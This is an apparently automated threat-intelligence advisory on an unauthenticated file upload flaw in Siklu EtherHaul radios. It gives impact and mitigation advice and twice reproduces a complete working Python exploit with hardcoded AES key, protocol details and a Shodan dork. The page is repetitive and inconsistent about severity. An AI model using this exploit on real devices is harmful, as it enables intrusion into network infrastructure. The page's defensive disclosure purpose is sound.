Reconnecting to live updates…

Siklu EtherHaul Series EH-8010 - Arbitrary File Upload

Severity: mediumType: exploit

The Siklu EtherHaul Series EH-8010 devices are vulnerable to an arbitrary file upload exploit that allows attackers to upload malicious files to the device. This vulnerability can be exploited remotely via the device's web interface, potentially leading to unauthorized code execution or system compromise. The exploit code is publicly available and written in Python, facilitating easier exploitation by attackers. Although no known exploits are currently observed in the wild, the vulnerability poses a medium risk due to the potential impact on device integrity and network security. European organizations using these devices in their wireless backhaul infrastructure could face disruptions or unauthorized access if exploited. Mitigation is complicated by the absence of official patches, requiring network segmentation, access restrictions, and monitoring to reduce risk. Countries with significant deployments of Siklu EtherHaul devices, especially those with critical telecom or infrastructure networks, are more likely to be targeted. Given the ease of exploitation and potential impact, the threat severity is assessed as high. Defenders should prioritize identifying affected devices, restricting management interface access, and monitoring for suspicious activity to mitigate risk.

AI Analysis

Technical Summary

The Siklu EtherHaul Series EH-8010 is a wireless backhaul device used primarily in point-to-point communication networks. A recently disclosed vulnerability allows arbitrary file upload via the device's web interface, enabling an attacker to upload malicious files without proper authentication or input validation. This flaw can be exploited remotely, potentially allowing attackers to execute arbitrary code, modify device configurations, or disrupt network operations. The exploit code, written in Python, is publicly available on Exploit-DB (ID 52467), lowering the barrier for exploitation. Although no patches or official advisories have been released, the vulnerability represents a significant risk to the confidentiality, integrity, and availability of networks relying on these devices. The exploit targets the web management interface, which if exposed to untrusted networks, increases the attack surface. The absence of authentication requirements or weak authentication mechanisms exacerbates the threat. This vulnerability is particularly concerning for organizations that rely on Siklu EtherHaul devices for critical infrastructure connectivity, as compromise could lead to lateral movement within networks or persistent access. The medium severity rating provided likely underestimates the real-world impact given the potential for full device compromise and network disruption.

Potential Impact

European organizations utilizing Siklu EtherHaul EH-8010 devices in their wireless backhaul infrastructure face risks including unauthorized access to network devices, potential interception or manipulation of data traffic, and disruption of critical communication links. Compromise of these devices could allow attackers to pivot into internal networks, undermining confidentiality and integrity of sensitive information. The availability of network services could also be impacted, causing outages or degraded performance in telecommunications or enterprise environments. Given the strategic importance of wireless backhaul in urban and rural connectivity, especially for telecom providers and critical infrastructure operators, exploitation could have cascading effects on service delivery and operational continuity. The lack of patches increases the window of exposure, making proactive mitigation essential. Additionally, regulatory compliance risks arise if data breaches or service disruptions occur due to this vulnerability.

Mitigation Recommendations

Since no official patches are currently available, European organizations should implement the following specific mitigations: 1) Immediately audit and inventory all Siklu EtherHaul EH-8010 devices within the network to identify exposure. 2) Restrict access to the device management web interface by implementing strict network segmentation and firewall rules, allowing only trusted administrative hosts to connect. 3) Disable remote management interfaces if not required or enforce VPN-based access with strong multi-factor authentication. 4) Monitor network traffic and device logs for unusual file upload attempts or unauthorized access patterns. 5) Employ intrusion detection/prevention systems (IDS/IPS) tuned to detect exploitation attempts targeting the EtherHaul web interface. 6) Engage with Siklu support channels to obtain any available firmware updates or workarounds. 7) Consider deploying compensating controls such as application-layer gateways or reverse proxies that can filter malicious requests. 8) Prepare incident response plans specific to potential device compromise scenarios. These steps go beyond generic advice by focusing on access control, monitoring, and compensating controls tailored to the device and its operational context.

Affected Countries

Germany, France, United Kingdom, Italy, Spain, Netherlands, Belgium, Poland, Sweden, Finland

Indicators of Compromise

exploit-code: # Exploit Title: Siklu EtherHaul Series - Unauthenticated Arbitrary File Upload # Shodan Dork: "EH-8010" or "EH-1200" # Date: 2025-08-02 # Exploit Author: semaja2 - Andrew James <semaja2@gmail.com> # Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon # Software Link: ftp://ftp.bubakov.net/siklu/ # Version: EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3 # Tested on: Linux # CVE: CVE-2025-57176 # Blog: https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/ #!/usr/bin/env python3 import argparse, socket, struct from Crypto.Cipher import AES PORT = 555 HDR_LEN = 0x90 IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72) KEY = bytes([ 0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5, 0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17, 0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0, 0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82 ]) def recv_exact(sock: socket.socket, n: int) -> bytes: out = bytearray() while len(out) < n: chunk = sock.recv(n - len(out)) if not chunk: raise ConnectionError('socket closed') out += chunk return bytes(out) def pad16_zero(b: bytes) -> bytes: r = len(b) & 0x0F return b if r == 0 else (b + b'\x00' * (16 - r)) def hdr_checksum(hdr: bytes) -> int: return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF def build_header(flag: int, msg: int, payload_len: int, path: bytes) -> bytes: hdr = bytearray(HDR_LEN) hdr[0] = flag & 0xFF hdr[1] = msg & 0xFF struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF) p = path if path.endswith(b'\x00') else (path + b'\x00') max_path = HDR_LEN - 0x10 hdr[0x10:0x10 + min(len(p), max_path)] = p[:max_path] struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr)) return bytes(hdr) class RFPipeSession: def __init__(self, key: bytes, iv0: bytes): self.key = key self.send_iv = iv0 self.recv_iv = iv0 def enc_send(self, sock: socket.socket, data: bytes) -> None: cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv) ct = cipher.encrypt(data) self.send_iv = ct[-16:] sock.sendall(ct) def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes: if n_plain <= 0: return b'' n_padded = (n_plain + 15) & ~15 ct = recv_exact(sock, n_padded) cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv) pt = cipher.decrypt(ct) self.recv_iv = ct[-16:] return pt[:n_plain] def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None: if len(hdr_plain) != HDR_LEN: raise ValueError('header must be 0x90 bytes') self.enc_send(sock, hdr_plain) def recv_header(self, sock: socket.socket) -> bytes: ct = recv_exact(sock, HDR_LEN) cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv) pt = cipher.decrypt(ct) self.recv_iv = ct[-16:] return pt def connect_any(host: str, port: int) -> socket.socket: infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM) last_err = None for fam, st, proto, _, sa in infos: s = socket.socket(fam, st, proto) try: s.connect(sa) return s except Exception as e: last_err = e s.close() raise ConnectionError(f'connect failed: {last_err}') def main(): ap = argparse.ArgumentParser(description='rfpiped file upload client (msg 0x04)') ap.add_argument('target', help='IPv4/IPv6 address') ap.add_argument('--path', required=True, help='remote path string for header+0x10 (NUL will be appended)') ap.add_argument('--file', required=True, help='local file to send as payload') ap.add_argument('--recv', action='store_true', help='receive and print server ACK/response') args = ap.parse_args() with open(args.file, 'rb') as f: payload = f.read() path_bytes = args.path.encode('utf-8') hdr_plain = build_header(flag=0x00, msg=0x04, payload_len=len(payload), path=path_bytes) sess = RFPipeSession(KEY, IV0) with connect_any(args.target, PORT) as s: sess.send_header(s, hdr_plain) if payload: sess.enc_send(s, pad16_zero(payload)) if args.recv: rh = sess.recv_header(s) flag = rh[0]; rmsg = rh[1] rlen = struct.unpack_from('<I', rh, 0x08)[0] print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}') if rmsg in (0x03, 0x05): return if rlen: body = sess.dec_recv(s, rlen) if body.endswith(b'\x00'): body = body[:-1] try: print(body.decode('utf-8', errors='replace')) except Exception: print(body.hex()) if __name__ == '__main__': main()

Siklu EtherHaul Series EH-8010 - Arbitrary File Upload

Severity: medium

Type: exploit

Technical Summary

Potential Impact

Mitigation Recommendations

Affected Countries

Germany, France, United Kingdom, Italy, Spain, Netherlands, Belgium, Poland, Sweden, Finland

Indicators of Compromise

exploit-code: # Exploit Title: Siklu EtherHaul Series - Unauthenticated Arbitrary File Upload # Shodan Dork: "EH-8010" or "EH-1200" # Date: 2025-08-02 # Exploit Author: semaja2 - Andrew James <semaja2@gmail.com> # Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon # Software Link: ftp://ftp.bubakov.net/siklu/ # Version: EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3 # Tested on: Linux # CVE: CVE-2025-57176 # Blog: https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/ #!/usr/bin/env python3 import argparse, socket, struct from Crypto.Cipher import AES PORT = 555 HDR_LEN = 0x90 IV0 = struct.pack('<4I', 0xEA703B82, 0x75A9A17B, 0x1DFC7BB9, 0x55A24D72) KEY = bytes([ 0x89,0xE7,0xFF,0xBE,0xEB,0x2D,0x73,0xF5, 0xA9,0x10,0xFC,0x42,0x5B,0x1F,0x36,0x17, 0x9F,0xB9,0x5E,0x75,0x35,0xA3,0x42,0xA0, 0x5D,0x02,0x48,0xB1,0x19,0xD2,0x4B,0x82 ]) def recv_exact(sock: socket.socket, n: int) -> bytes: out = bytearray() while len(out) < n: chunk = sock.recv(n - len(out)) if not chunk: raise ConnectionError('socket closed') out += chunk return bytes(out) def pad16_zero(b: bytes) -> bytes: r = len(b) & 0x0F return b if r == 0 else (b + b'\x00' * (16 - r)) def hdr_checksum(hdr: bytes) -> int: return (sum(hdr[0:0x0C]) + sum(hdr[0x10:HDR_LEN])) & 0xFFFFFFFF def build_header(flag: int, msg: int, payload_len: int, path: bytes) -> bytes: hdr = bytearray(HDR_LEN) hdr[0] = flag & 0xFF hdr[1] = msg & 0xFF struct.pack_into('<I', hdr, 0x08, payload_len & 0xFFFFFFFF) p = path if path.endswith(b'\x00') else (path + b'\x00') max_path = HDR_LEN - 0x10 hdr[0x10:0x10 + min(len(p), max_path)] = p[:max_path] struct.pack_into('<I', hdr, 0x0C, hdr_checksum(hdr)) return bytes(hdr) class RFPipeSession: def __init__(self, key: bytes, iv0: bytes): self.key = key self.send_iv = iv0 self.recv_iv = iv0 def enc_send(self, sock: socket.socket, data: bytes) -> None: cipher = AES.new(self.key, AES.MODE_CBC, iv=self.send_iv) ct = cipher.encrypt(data) self.send_iv = ct[-16:] sock.sendall(ct) def dec_recv(self, sock: socket.socket, n_plain: int) -> bytes: if n_plain <= 0: return b'' n_padded = (n_plain + 15) & ~15 ct = recv_exact(sock, n_padded) cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv) pt = cipher.decrypt(ct) self.recv_iv = ct[-16:] return pt[:n_plain] def send_header(self, sock: socket.socket, hdr_plain: bytes) -> None: if len(hdr_plain) != HDR_LEN: raise ValueError('header must be 0x90 bytes') self.enc_send(sock, hdr_plain) def recv_header(self, sock: socket.socket) -> bytes: ct = recv_exact(sock, HDR_LEN) cipher = AES.new(self.key, AES.MODE_CBC, iv=self.recv_iv) pt = cipher.decrypt(ct) self.recv_iv = ct[-16:] return pt def connect_any(host: str, port: int) -> socket.socket: infos = socket.getaddrinfo(host, port, socket.AF_UNSPEC, socket.SOCK_STREAM) last_err = None for fam, st, proto, _, sa in infos: s = socket.socket(fam, st, proto) try: s.connect(sa) return s except Exception as e: last_err = e s.close() raise ConnectionError(f'connect failed: {last_err}') def main(): ap = argparse.ArgumentParser(description='rfpiped file upload client (msg 0x04)') ap.add_argument('target', help='IPv4/IPv6 address') ap.add_argument('--path', required=True, help='remote path string for header+0x10 (NUL will be appended)') ap.add_argument('--file', required=True, help='local file to send as payload') ap.add_argument('--recv', action='store_true', help='receive and print server ACK/response') args = ap.parse_args() with open(args.file, 'rb') as f: payload = f.read() path_bytes = args.path.encode('utf-8') hdr_plain = build_header(flag=0x00, msg=0x04, payload_len=len(payload), path=path_bytes) sess = RFPipeSession(KEY, IV0) with connect_any(args.target, PORT) as s: sess.send_header(s, hdr_plain) if payload: sess.enc_send(s, pad16_zero(payload)) if args.recv: rh = sess.recv_header(s) flag = rh[0]; rmsg = rh[1] rlen = struct.unpack_from('<I', rh, 0x08)[0] print(f'Response: flag=0x{flag:02x} msg=0x{rmsg:02x} length={rlen}') if rmsg in (0x03, 0x05): return if rlen: body = sess.dec_recv(s, rlen) if body.endswith(b'\x00'): body = body[:-1] try: print(body.decode('utf-8', errors='replace')) except Exception: print(body.hex()) if __name__ == '__main__': main()

Source: Exploit-DB RSS Feed

Published: Sat Jan 17 2026

Siklu EtherHaul Series EH-8010 - Arbitrary File Upload

Medium

Exploitweb exploit

Published: Sat Jan 17 2026 (01/17/2026, 00:00:00 UTC)

Source: Exploit-DB RSS Feed

Description

AI-Powered Analysis

AILast updated: 02/05/2026, 09:10:33 UTC

Technical Analysis

Potential Impact

Mitigation Recommendations

Affected Countries

Need more detailed analysis?Upgrade to Pro Console

Technical Details

Edb Id: 52467
Has Exploit Code: true
Code Language: python

Indicators of Compromise

Exploit Source Code

Exploit Code

Exploit code for Siklu EtherHaul Series EH-8010 - Arbitrary File Upload

# Exploit Title: Siklu EtherHaul Series - Unauthenticated Arbitrary File Upload
# Shodan Dork: "EH-8010" or "EH-1200"
# Date: 2025-08-02
# Exploit Author: semaja2 - Andrew James <semaja2@gmail.com>
# Vendor Homepage: https://www.ceragon.com/products/siklu-by-ceragon
# Software Link: ftp://ftp.bubakov.net/siklu/
# Version:  EH-8010 and EH-1200 Firmware 7.4.0 - 10.7.3
# Tested on: Linux
# CVE: CVE-2025-57176
# Blog: https://semaja2.net/2025/08/03/siklu-eh-unauth-arbitrary-file-upload/

#!/usr/bin/... (4411 more characters)

Code Length: 4,911 characters

Threat ID: 696c9008d302b072d9ad2ab6

Added to database: 1/18/2026, 7:47:20 AM

Last enriched: 2/5/2026, 9:10:33 AM

Last updated: 2/8/2026, 1:30:24 AM

Community Reviews

0 reviews

Crowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.

Sort by

Loading community insights…

Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.